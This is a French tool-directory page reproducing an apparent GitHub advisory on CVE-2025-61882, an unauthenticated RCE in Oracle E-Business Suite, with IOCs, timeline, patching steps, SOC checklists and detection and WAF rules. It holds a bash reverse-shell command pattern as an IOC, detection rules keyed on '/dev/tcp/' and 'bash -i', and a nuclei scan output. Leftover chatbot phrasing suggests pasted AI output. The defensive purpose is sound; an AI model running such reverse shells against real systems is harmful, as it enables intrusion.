Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Blackash-CVE-2025-61882 — Fournit un avis détaillé sur la CVE-2025-61882 avec une analyse technique, des IOC, des requêtes de détection et un modèle d'exploit basé sur nuclei pour la RCE pré-authentification d'Oracle E-Business Suite. | Kitploit
Outils/GitHubGitHub/222dff-afk/blackash-cve-2025-61882
Analyse des VulnérabilitésExploitationSécurité WebTests d'IntrusionRenseignement sur les MenacesRéponse aux Incidents
GitHub222dff-afk/blackash-cve-2025-61882

Blackash-CVE-2025-61882

Fournit un avis détaillé sur la CVE-2025-61882 avec une analyse technique, des IOC, des requêtes de détection et un modèle d'exploit basé sur nuclei pour la RCE pré-authentification d'Oracle E-Business Suite.

Voir le dépôt
2il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🛡️🚨 CVE‑2025‑61882 — Exécution de code à distance critique sans authentification dans Oracle E‑Business Suite (EBS) 🚨🛡️

Résumé court : Exécution de code à distance critique sans authentification dans Oracle E‑Business Suite (EBS) — concerne les versions 12.2.3 → 12.2.14, CVSS 9.8, activement exploitée dans la nature (activité de rançongiciel/extorsion signalée). ([oracle.com][1])


📌 Faits rapides (tableau)

ChampDétails
🆔 CVECVE‑2025‑61882
🧾 Produit / ComposantOracle E‑Business Suite (EBS) — intégration Concurrent Processing / BI Publisher
📦 Versions concernées12.2.3 → 12.2.14
🔢 CVSS (v3.1)9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H)
⚠️ TypeExécution de code à distance (RCE) — aucune authentification requise
🔥 Exploitée dans la natureOui — campagnes d'exploitation massive / d'extorsion signalées
📅 Divulgation / chronologieOctobre 2025 (avis du fournisseur + analyses publiques). ([oracle.com][1])

(Consolidé ci-dessus à partir de l'avis du fournisseur, NVD/CISA et de plusieurs analyses de fournisseurs.) ([oracle.com][1])


💥 Impact (tableau)

Domaine d'impactCe que cela signifie
🔓 ConfidentialitéLes attaquants peuvent lire des données sensibles RH/finances/ERP
🛠️ IntégritéLes attaquants peuvent modifier des enregistrements, créer des backdoors ou altérer des configurations
⚡ DisponibilitéLes attaquants peuvent perturber les services, exécuter un rançongiciel ou détruire les sauvegardes
🧭 Niveau de risqueExtrême — RCE sans authentification sur un système ERP critique → possible pivot complet sur le domaine

Références signalant une exploitation à fort impact et un lien avec le rançongiciel. ([Rapid7][2])


🛠️ Résumé technique (concis)

  • Vecteur : Les requêtes HTTP/HTTPS vers les points de terminaison web EBS exposés déclenchent une chaîne de vulnérabilités dans l'intégration Concurrent Processing / BI Publisher conduisant à une exécution de code à distance. ([oracle.com][1])
  • Complexité : Faible (aucune authentification, aucune interaction utilisateur). ([nvd.nist.gov][3])
  • Payloads observés : modèles de reverse shell, web shells, scripts déposés utilisés pour l'exfiltration de données et l'extorsion. ([Rapid7][2])

🕵️‍♀️ Indicateurs de compromission (IOC) — exemples (tableau)

Oracle et les équipes de réponse aux incidents ont publié des IOC ; voici des exemples représentatifs signalés dans les avis et les analyses des fournisseurs. Recherchez ces modèles dans les journaux et les points de terminaison. ([oracle.com][1])

TypeExemple
🌐 IP (observées)200.107.207.26, 185.181.60.11 (exemples d'adresses signalés)
🧾 Modèle de commandesh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 (reverse shell)
🗂️ Empreintes de fichiersPlusieurs empreintes SHA‑256 pour des scripts d'exploitation suspects (voir l'avis du fournisseur pour la liste complète)
🕳️ ArtefactsWeb shells inattendus, nouvelles tâches cron, connexions sortantes suspectes vers des IP/ports inhabituels

Si vous voulez la liste complète des IOC (IP, empreintes complètes, noms de fichiers), je peux la coller ici — dites « colle les IOC ». (Aucun lien.)


🧭 Chronologie (compacte)

DateÉvénement
9 août 2025Première activité d'exploitation réelle signalée (télémétrie du fournisseur). ([crowdstrike.com][4])
Début octobre 2025Oracle a publié une alerte de sécurité / disponibilité des correctifs pour EBS. ([oracle.com][1])
6–7 octobre 2025CISA a ajouté la CVE à son catalogue Known Exploited Vulnerabilities (KEV) (directives pour les agences fédérales, date limite d'atténuation). ([cisa.gov][5])
Octobre 2025 (en cours)Plusieurs analyses de fournisseurs et rapports d'exploitation massive (CrowdStrike, Rapid7, Tenable, etc.). ([crowdstrike.com][4])

✅ Actions recommandées immédiates (tableau d'étapes)

PrioritéActionNotes / exemples spécifiques
1️⃣ CritiqueCorriger les instances EBS concernéesAppliquez immédiatement les correctifs de l'alerte de sécurité Oracle pour les versions 12.2.3–12.2.14. ([oracle.com][1])
2️⃣ ÉlevéeIsoler / restreindre l'accès aux points de terminaison web EBSBloquez le HTTP/HTTPS exposé à Internet vers EBS ; autorisez uniquement les IP d'administration de confiance ou le VPN.
3️⃣ ÉlevéeActiver/ajuster les règles WAFDéployez les signatures WAF du fournisseur/communauté pour les modèles d'exploitation ; bloquez les payloads suspects. ([Rapid7][2])
4️⃣ ÉlevéeChasser & détecterRecherchez dans les journaux les commandes de reverse shell, les écritures de fichiers anormales et les connexions sortantes vers les IOC.
5️⃣ IncidentContenir & répondre en cas de compromissionIsolez l'hôte, préservez les preuves forensiques, changez les identifiants, reconstruisez à partir de sauvegardes propres.
6️⃣ PolitiqueSignaler & notifierSi vous êtes soumis à des exigences réglementaires/contractuelles, notifiez les parties prenantes et les autorités conformément à la politique (les directives CISA/KEV peuvent s'appliquer). ([nvd.nist.gov][3])

💀 Exploits :

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml                                                                                                  

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[INF] Scan completed in 485.722955ms. 1 matches found.
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ nuclei -l targets.txt -t CVE-2025-61882.yaml                        

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 7
[INF] Running httpx on input host
[INF] Found 7 URL from httpx
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Mon, 02 Oct 2023 13:57:20 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sat, 31 Aug 2024 15:30:07 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Tue, 15 Aug 2023 16:58:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Fri, 30 Aug 2024 21:49:46 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sun, 16 May 2021 17:03:44 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http:/10.10.10.10:8000 ["Fri, 01 Sep 2023 13:20:35 GMT"]
[INF] Scan completed in 621.029991ms. 7 matches found.
CVE-2025-61882 Oracle E-Business Suite 1
CVE-2025-61882 Oracle E-Business Suite 4

🕵️‍♂️ Exemples de requêtes de détection (prêtes à copier/coller)

Splunk (recherche du modèle de reverse shell) :

root@kitploit:~
index=web OR index=ebs_logs (uri_path="/cgi/*" OR uri_path="/xmlpserver/*") 
| search "* /bin/bash -i * /dev/tcp/*" OR "*/dev/tcp/* 0>&1*"
| table _time host src_ip user uri_path _raw

ELK / Kibana (KQL) :

root@kitploit:~
http.request.body : "*bash -i*" or http.request.body : "* /dev/tcp/*"

Règle Sigma (conceptuelle) :

root@kitploit:~
title: Oracle EBS Reverse Shell via HTTP
detection:
  selection:
    EventID: 1234
    ProcessCommandLine|contains: "/dev/tcp/"
  condition: selection

(Adaptez les noms de champs à votre schéma de journaux ; utilisez les IOC pour affiner.)


🔐 Exemples d'atténuations pare-feu / WAF (exemples)

  • ACL réseau : Bloquez le trafic entrant 80/443 vers les serveurs EBS depuis Internet public ; autorisez uniquement le VPN de gestion et les IP d'administration spécifiques.
  • Règle WAF (pseudo) : Bloquez les requêtes contenant bash -i, /dev/tcp/, base64 -d ou des modèles de payload d'exploitation typiques dans les corps POST ou les paramètres d'URL.
  • Limitation de débit / géo-blocage : Limitez temporairement le débit des requêtes vers les points de terminaison EBS et bloquez le trafic provenant de zones géographiques connues comme malveillantes si cela est cohérent avec les besoins métier.

🧾 Liste de contrôle pour le correctif (rapide)

  1. Effectuez des sauvegardes et des instantanés des images VM ✅
  2. Testez le correctif en préproduction (si possible) ✅
  3. Appliquez le correctif de l'alerte de sécurité Oracle à EBS 12.2.3–12.2.14 ✅ (suivez les étapes du fournisseur : arrêter les services, appliquer le correctif, exécuter les tâches post-installation) ([oracle.com][1])
  4. Redémarrez et validez l'état de santé des services ✅
  5. Re-scannez pour détecter les artefacts de compromission et effectuez des vérifications forensiques complètes de l'hôte ✅

🧠 Notes sur l'acteur de la menace / l'exploitation

  • Plusieurs fournisseurs attribuent l'exploitation active à des groupes liés à l'extorsion/rançongiciel (par ex., Cl0p / Graceful Spider ou des acteurs associés) — utilisée pour le vol de données et l'extorsion. Le niveau de confiance de l'attribution varie selon les fournisseurs. ([crowdstrike.com][4])

📋 Pour les équipes SOC / IR — liste de contrôle playbook

  • Triage : Tentative d'exploitation entrante ? Capturez la requête HTTP, les en-têtes, le corps POST.
  • Contenir : Isolez le réseau de l'hôte affecté.
  • Forensique : Collectez la mémoire, l'image disque, les journaux du serveur web, les journaux d'audit.
  • Remédier : Reconstruisez l'hôte à partir d'une image propre si la compromission est confirmée.
  • Récupération : Restaurez à partir de sauvegardes connues comme saines ; faites pivoter les identifiants.
  • Signaler : Consignez l'incident, notifiez les parties prenantes, conformez-vous aux directives KEV/CISA si applicable. ([nvd.nist.gov][3])

🔎 Sources (liste courte de rapports faisant autorité)

(Je liste les sources pour l'exactitude — je ne collerai pas de liens ici mais voici les noms des fournisseurs/autorités pour que vous puissiez les référencer si nécessaire.)

  • Alerte de sécurité Oracle / Disponibilité des correctifs (avis du fournisseur). ([oracle.com][1])
  • NVD / CISA (entrée du catalogue KEV CISA et métadonnées NVD). ([nvd.nist.gov][3])
  • Rapport technique CrowdStrike sur les campagnes. ([crowdstrike.com][4])
  • Analyses et FAQ de Rapid7 / Tenable / autres fournisseurs. ([Rapid7][2])

Voici une clause de non-responsabilité professionnelle, riche en emojis que vous pouvez utiliser pour votre rapport CVE‑2025‑61882 :


⚠️💀 Clause de non-responsabilité 💀⚠️

Les informations fournies dans ce rapport sont uniquement à des fins de sensibilisation, de défense et d'éducation. L'utilisation de ces informations pour exploiter, attaquer ou compromettre un système sans autorisation explicite est illégale et peut entraîner des sanctions pénales et civiles.

🔒 Appliquez toujours les correctifs recommandés, suivez les bonnes pratiques de sécurité et effectuez les tests uniquement dans des environnements contrôlés.

🧾 Ce rapport ne remplace pas les avis officiels des fournisseurs — consultez toujours les alertes de sécurité Oracle et les directives autorisées pour obtenir des instructions de remédiation définitives.


Télécharger l’outil